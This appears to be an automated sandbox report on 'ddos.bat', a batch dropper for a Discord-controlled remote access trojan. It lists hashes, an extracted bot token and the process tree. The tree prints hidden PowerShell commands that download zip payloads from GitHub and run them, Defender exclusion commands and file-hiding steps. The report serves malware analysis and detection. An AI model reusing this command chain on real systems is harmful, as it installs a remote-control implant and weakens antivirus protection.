Analysis
-
max time kernel
93s -
max time network
132s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-10-2024 19:30
Static task
static1
Behavioral task
behavioral1
Sample
ddos.bat
Resource
win11-20241007-en
General
-
Target
ddos.bat
-
Size
1KB
-
MD5
15ee8aecfc89d8bed8f362cb46e4b8bb
-
SHA1
c39b884897d73006daa07d29264670d181835624
-
SHA256
7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082
-
SHA512
553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66
Malware Config
Extracted
discordrat
-
discord_token
MTI5Njg5NDEwMjY0NTkwMzQwMA.GffxcT.wWuk4gdi5T-RNzCLfFQ4XgAEMO4ZjpXcRu5E5Y
-
server_id
1293738586679672945
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 2 2500 powershell.exe 4 2500 powershell.exe 5 3020 powershell.exe 6 3020 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1384 powershell.exe 3352 powershell.exe 664 powershell.exe 2500 powershell.exe 3020 powershell.exe 2348 powershell.exe 3384 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Discord.exepid Process 2984 Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 11 discord.com 12 discord.com 1 raw.githubusercontent.com 3 discord.com 4 raw.githubusercontent.com 6 raw.githubusercontent.com 8 discord.com 10 discord.com -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 664 powershell.exe 664 powershell.exe 2500 powershell.exe 2500 powershell.exe 1384 powershell.exe 1384 powershell.exe 2348 powershell.exe 2348 powershell.exe 3384 powershell.exe 3384 powershell.exe 3352 powershell.exe 3352 powershell.exe 3020 powershell.exe 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDiscord.exedescription pid Process Token: SeDebugPrivilege 664 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeDebugPrivilege 2984 Discord.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.execmd.execmd.exedescription pid Process procid_target PID 4564 wrote to memory of 664 4564 cmd.exe 81 PID 4564 wrote to memory of 664 4564 cmd.exe 81 PID 4564 wrote to memory of 1920 4564 cmd.exe 82 PID 4564 wrote to memory of 1920 4564 cmd.exe 82 PID 4564 wrote to memory of 4604 4564 cmd.exe 83 PID 4564 wrote to memory of 4604 4564 cmd.exe 83 PID 4564 wrote to memory of 2500 4564 cmd.exe 85 PID 4564 wrote to memory of 2500 4564 cmd.exe 85 PID 4564 wrote to memory of 3432 4564 cmd.exe 87 PID 4564 wrote to memory of 3432 4564 cmd.exe 87 PID 4564 wrote to memory of 4080 4564 cmd.exe 88 PID 4564 wrote to memory of 4080 4564 cmd.exe 88 PID 4080 wrote to memory of 1384 4080 cmd.exe 90 PID 4080 wrote to memory of 1384 4080 cmd.exe 90 PID 4080 wrote to memory of 2348 4080 cmd.exe 91 PID 4080 wrote to memory of 2348 4080 cmd.exe 91 PID 4080 wrote to memory of 3384 4080 cmd.exe 92 PID 4080 wrote to memory of 3384 4080 cmd.exe 92 PID 4080 wrote to memory of 3368 4080 cmd.exe 93 PID 4080 wrote to memory of 3368 4080 cmd.exe 93 PID 3368 wrote to memory of 3352 3368 cmd.exe 95 PID 3368 wrote to memory of 3352 3368 cmd.exe 95 PID 3368 wrote to memory of 3020 3368 cmd.exe 96 PID 3368 wrote to memory of 3020 3368 cmd.exe 96 PID 3368 wrote to memory of 2692 3368 cmd.exe 97 PID 3368 wrote to memory of 2692 3368 cmd.exe 97 PID 3368 wrote to memory of 2984 3368 cmd.exe 98 PID 3368 wrote to memory of 2984 3368 cmd.exe 98 PID 3368 wrote to memory of 1596 3368 cmd.exe 99 PID 3368 wrote to memory of 1596 3368 cmd.exe 99 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 4604 attrib.exe 1596 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:1920
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:4604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\system32\tar.exetar -xf 1.zip2⤵PID:3432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Windows\system32\tar.exetar -xf Discord.zip4⤵PID:2692
-
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d4⤵
- Views/modifies file attributes
PID:1596
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268B
MD5cdb8a5fcca6c6b2ac156c95610dd62b0
SHA1fc9143fbdfc511193d627682d03da517ef03eac0
SHA256c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df
SHA512b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9
-
Filesize
661B
MD515af212f6b388a57510af30146ea51f8
SHA19833f92d882d8e69bd453bdb2f3feda15d961c0f
SHA25662b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897
SHA51290614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05
-
Filesize
327B
MD59cbac74f137243a22af973eacd90de31
SHA13260ea401134322fe037a35b685c66a0793c3658
SHA256567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465
SHA512e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60
-
Filesize
51KB
MD585f1a70f2760fc2b1c9dd2e11d178548
SHA1c92415eb189ebb19efa29a1be6eeea7421d2eabc
SHA2569c3a2642864d1680716134111aa3ce37cf1f99829a4d8301b4972230358389ec
SHA512f5a8e36d502992f733dd5473d6146bd0a1b3f17a7377b62f2f628318cccf9cec236ea6bac268d9a4377ea12cd4d984f4b59553d4c5de2481bcb710f20d5a2aef
-
Filesize
45KB
MD56c33dba78cdd4a159b34c812616bfa6a
SHA18e486a8492e7b782762c08765572da921435a759
SHA2560c92eb7b8f6dcf63ee71137c8f3908382e4d4010e2d3a55b4b8036e86260f47a
SHA512afe6084e6f50fe26796083a293bd79a82c06d42880657c5e9055bb52677d43cbe12a63134c2dae0259c1f6f6f70bd6ea3237f3cd3665f6e0d3118ff70c225581
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1KB
MD57355f4a1d4e1a2519a4a60ee11f1d192
SHA18802bbb71f3e8947c02a7d835b31c7abf4289780
SHA2562fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3
SHA5127186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33
-
Filesize
64B
MD5b16dc67d8633fb86f9d9dc491097150e
SHA10ea564df2675c5e2a82449530dd070ad855dfcd6
SHA256378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b
SHA512c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd
-
Filesize
944B
MD5fcbfea2bed3d0d2533fe957f0f83e35c
SHA170ca46e89e31d8918c482848cd566090aaffd910
SHA256e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38
SHA512d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6
-
Filesize
944B
MD5485b869eae5bc5901ba90df51a4dc4ad
SHA15cab8e8bc1692848ebc580249aaa53a54f84d019
SHA256451bd339905e104e0dae5a76b629515c684bfd6cbb909ef8cec3cdccba44ced0
SHA51270471b73cbb49b8ea6af9792aba8090172b98534fdc446dade710b8a81510a084fec74b98b5eaebf44552902af11dcaa2a2e484762cafd52b247bdca4494e427
-
Filesize
64B
MD5dcfe1f94aa15e3ca618b4c5002c9c055
SHA1b8abdaf68684bc49756086840035b93f79329892
SHA256cf11bfe8cd92fd4293ae0bd884f2c3d397e68d54ea03352027ed6b6c93e8630d
SHA512bce3736f22af50ef73c7ca17942eebddc00ea5b216fa9ad8c704fb6b5c0cc8d0b8aa992fc47270148c23d8257ba2ab9cae079ca239abebef7a92182941f8a73c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82